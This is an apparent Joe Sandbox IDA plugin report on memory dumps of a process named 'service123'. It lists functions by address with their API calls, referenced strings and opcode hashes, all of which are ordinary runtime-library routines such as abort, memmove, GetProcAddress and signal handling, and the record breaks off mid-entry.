Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 6fc856638dd0683ad576a952b3630adc1962a4535a0ea37a2bd8e2da138b98d7
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 0841937068830F8AD712DF29C04066AF7E6AF81319F544A19FCB487A95E734D94F8BD2

Function 6C2FE59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 2411e08aba4ac860a505739a7ad3259776cdab6d823a203c14aff5da458e85cb
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 2421917058530F8AD712DE28C09066AF7E2AF41719F644A09FCB487A85E334D94F8BD2

Function 6C2FE714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 80b9e1899938fc49db9b90835448d9d6f8df9e8a7ad457ec76e04c85f198b6fd
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 4AE04F715C821F8AC612DE28C061599F7969A46349B40480AECE597D14D720D98F8B87

Function 6C309249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C309260
GetProcAddress.KERNEL32 ref: 6C30927A
LoadLibraryW.KERNEL32 ref: 6C30929F
GetProcAddress.KERNEL32 ref: 6C3092B3

Strings

msvcrt.dll, xrefs: 6C309255
SystemFunction036, xrefs: 6C3092A8
advapi32.dll, xrefs: 6C309298
rand_s, xrefs: 6C30926F

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 465caa53d8a1fdafedd740ce53fc3fed282a23ec7931b153af718f1e31f89a97
Instruction ID: 123457a7d8a7f074b246b1b7adbdc4799a86df5ce74ad53e87c70561f0792b04
Opcode Fuzzy Hash: 465caa53d8a1fdafedd740ce53fc3fed282a23ec7931b153af718f1e31f89a97
Instruction Fuzzy Hash: 66F04FB69453008BCB00FF79864721E7FB4BB06320F02092CD5C597600D334A414CF67

Function 6C38F670 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36D7DE), ref: 6C38F70D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36D7DE), ref: 6C38F738
memmove.MSVCRT ref: 6C38F787
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36D7DE), ref: 6C38F7BD
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36D7DE), ref: 6C38F808

Strings

basic_string::_M_replace, xrefs: 6C38F966

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 3fc82007085e45cd0d9b729554e05a3144571bf7f219f7c1baf180a82da73d16
Instruction ID: 336f24907fed2b0d37dc1b3f239ebb5e445b6084ace3d39992c4a6d45833215f
Opcode Fuzzy Hash: 3fc82007085e45cd0d9b729554e05a3144571bf7f219f7c1baf180a82da73d16
Instruction Fuzzy Hash: CF813675A0A3519FC701DF28C18051EBBE5AFCA688F64892EE4D587725D332D889CF63

Function 6C2FFEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C3000D2
WaitForSingleObject.KERNEL32 ref: 6C300117

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 11b6f81e12a51b5eab9411f090d68efcfd35506cf28ff73cb202f1a546328e67
Instruction ID: 0a3e6f1e055bc901a723c7a0e27456bf5e02e7120f4fd9294e008cdc5d913f45
Opcode Fuzzy Hash: 11b6f81e12a51b5eab9411f090d68efcfd35506cf28ff73cb202f1a546328e67
Instruction Fuzzy Hash: 21617F717493498FEB10EF69C5447ABBBF4AB46308F008619ECA987B80D771E546CF92

Function 6C2FE760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 1e23401dbf50f75deef60743a99ab106f477d77a59a118b82ab8caddf4af4f09
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: D601E571A9821E8FC701DA18C490A9AF7E6AB85314F004D29FCA587B14D230ECCBC7C2

Function 00532BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00532CC1

Strings

o, xrefs: 005330A8
0, xrefs: 0053313E

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: 5279f76d43fc6013765615a1cd34bc1f042c7aa060e0aeeb18e53d3cee6fa45d
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: 4FF18F71A046098FCB15CF68C4856ADBFF2BF88360F19C629E858AB391D734ED45CB90

Function 6C3032C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C303391

Strings

o, xrefs: 6C303778
0, xrefs: 6C30380E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 3374952c3401bf6b36a8b542e51004dadcaa56be5df56016d2bf9d6a518bde45
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 23F18172B056098FCB41CF68C480B9DBBF2BF89364F198269D854AB791D734E945CF90

Function 005314E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 005314F0
LoadLibraryA.KERNEL32 ref: 00531506
GetProcAddress.KERNEL32 ref: 00531525
GetProcAddress.KERNEL32 ref: 00531537

Strings

__deregister_frame_info, xrefs: 0053152C
libgcc_s_dw2-1.dll, xrefs: 005314E9, 005314FF
__register_frame_info, xrefs: 0053151A

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 5d68be9f1ad958fe774559e4ec72b606db7b7df744e1f24072e21fa855cc8eb3
Instruction ID: 6cf54d73040292d2d64314d1a52ac5981ba818ca7e14eb0d17e8428cc755f776
Opcode Fuzzy Hash: 5d68be9f1ad958fe774559e4ec72b606db7b7df744e1f24072e21fa855cc8eb3
Instruction Fuzzy Hash: EF0128B19097009BC700BFB8AA4D21EBFF4BB84750F01492DD9C987340EB749808DBA7

Function 6C2F13E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C2F13F0
LoadLibraryA.KERNEL32 ref: 6C2F1406
GetProcAddress.KERNEL32 ref: 6C2F1425
GetProcAddress.KERNEL32 ref: 6C2F1437

Strings

__deregister_frame_info, xrefs: 6C2F142C
__register_frame_info, xrefs: 6C2F141A
libgcc_s_dw2-1.dll, xrefs: 6C2F13E9, 6C2F13FF

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 1f1d3b186c83536037032549c5b0435e95243c54f8a0da032ea61119f7fde6ef
Instruction ID: 908642f68bccbaee27a0c12fcc7be83b79a1537e53d71558e1c33972f43a6b1e
Opcode Fuzzy Hash: 1f1d3b186c83536037032549c5b0435e95243c54f8a0da032ea61119f7fde6ef
Instruction Fuzzy Hash: 01019EB6A493189BC700BF78950725EFFF4AA46650F42482DDAD887A10D731D844CBA3

Function 6C317170 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C3171C1
strlen.MSVCRT ref: 6C3171DB
strlen.MSVCRT ref: 6C31722B
strlen.MSVCRT ref: 6C317288
strlen.MSVCRT ref: 6C3172DC

Strings

*, xrefs: 6C317410
basic_string::append, xrefs: 6C31747A, 6C317486, 6C317492, 6C31749E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: efdf993a2fe3b47a8981abade53907f35dac14dc6ef667f8e9b48bda8406cc8d
Instruction ID: 7db08df094e7c10613a8de7f2eae477d3bd83c7a6baeb07c66fbd76aa80655aa
Opcode Fuzzy Hash: efdf993a2fe3b47a8981abade53907f35dac14dc6ef667f8e9b48bda8406cc8d
Instruction Fuzzy Hash: D2A14C716086018FDB00EF68C18079EBBF1BB4A308F55896DD8949BB55DB35D84ACF93

Function 6C393B80 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C393C1F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C32E77E), ref: 6C393C83
memmove.MSVCRT ref: 6C393CBB
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C32E77E), ref: 6C393D2A

Strings

basic_string::_M_replace, xrefs: 6C393EAF

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 26c9697ca4f3393f838f371d99a8ba64ac29a521c89a641e51d5c66748b88b33
Instruction ID: cd19c06c1b14b12000144bb36069303b97239453f2e2286e7bd9c5c41e6d0cef
Opcode Fuzzy Hash: 26c9697ca4f3393f838f371d99a8ba64ac29a521c89a641e51d5c66748b88b33
Instruction Fuzzy Hash: 3A9133B56497518FC740EF28C08081AFBE1BF89348F50892DE4C99B720E735E985CF82

Function 6C2FE800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 5707f062179f123059815737db96c84d7c54c7e61b08a75345588ef9ff9cd2e3
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 8B21D7319D420ECFD711EE19C48199AF7A6AF86315B548A15ECA447A28D330E88B87E2

Function 00531E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00531EAF
signal.MSVCRT ref: 00531EF6
signal.MSVCRT ref: 00531F0F
signal.MSVCRT ref: 00531F36
signal.MSVCRT ref: 00531F72
signal.MSVCRT ref: 00531FBF
signal.MSVCRT ref: 00531FD5
signal.MSVCRT ref: 00531FEB

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 38f5fc503b3d766801d3a7dc99eba0966eaf86263073a25827fa20ad8c5e3d48
Instruction ID: 3271c30707d2f3beae37616e8b12679dd261f357d0ecefd1303f214c16048c2d
Opcode Fuzzy Hash: 38f5fc503b3d766801d3a7dc99eba0966eaf86263073a25827fa20ad8c5e3d48
Instruction Fuzzy Hash: 6131DB705087019AE7246FB4C98832E7FD4BF85358F154D1DE8D487281DB7EC888AB6B

Function 00534360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00534378

Strings

Inf, xrefs: 00534E35, 00534E4D
NaN, xrefs: 00534D3B
@, xrefs: 00534647

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: f69d97bf600ba23d3c0c042d68af846c1330db68787fddd70b23eeb5ed80ad3b
Instruction ID: 4ee5edc3613922b7d59399749f09391808d802886336710a88ff0dbcb33417af
Opcode Fuzzy Hash: f69d97bf600ba23d3c0c042d68af846c1330db68787fddd70b23eeb5ed80ad3b
Instruction Fuzzy Hash: A6F1AE7560C3868BDB318F24D4907ABBFE1BB85314F148A2DE9DD87381D735A9069F82

Function 6C304A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C304A48

Strings

NaN, xrefs: 6C30540B
Inf, xrefs: 6C305505, 6C30551D
@, xrefs: 6C304D17

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: db2345f21485fb0801d4577d8e06bc355c267276d9e6f75e731e45d6b3aa541d
